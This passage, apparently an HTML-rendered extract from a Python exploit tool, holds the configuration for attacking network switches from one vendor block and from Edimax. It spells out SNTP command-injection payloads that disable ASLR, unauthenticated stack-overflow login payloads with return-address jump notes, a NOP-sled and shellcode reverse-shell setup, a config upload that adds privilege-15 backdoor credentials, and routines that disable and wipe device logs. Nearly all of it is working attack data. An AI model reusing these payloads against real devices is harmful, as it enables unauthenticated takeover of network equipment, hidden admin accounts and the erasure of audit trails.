						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=aaa_userDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment">#</span>
						<span class="token comment"># Most probably it is vulnerable</span>
						<span class="token comment">#</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>	<span class="token comment"># Not vulnerable </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>					<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=+&amp;cursntpPort=139'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>

						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Edimax'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'EDIMAX Technology Co., Ltd.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;empty=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_saverun_cfg'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_uploadfail'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span> <span class="token comment"># Not the real content, its the result of invalid firmware (workaround)</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'login.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/VUL.TXT'</span><span class="token punctuation">,</span> <span class="token comment"># We cannot control the content...</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">40</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;password='</span><span class="token operator">+</span> <span class="token string">'/'</span> <span class="token operator">*</span> <span class="token number">23</span> <span class="token operator">+</span><span class="token string">'/tmp/VUL.TXT&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'1'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_acctDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
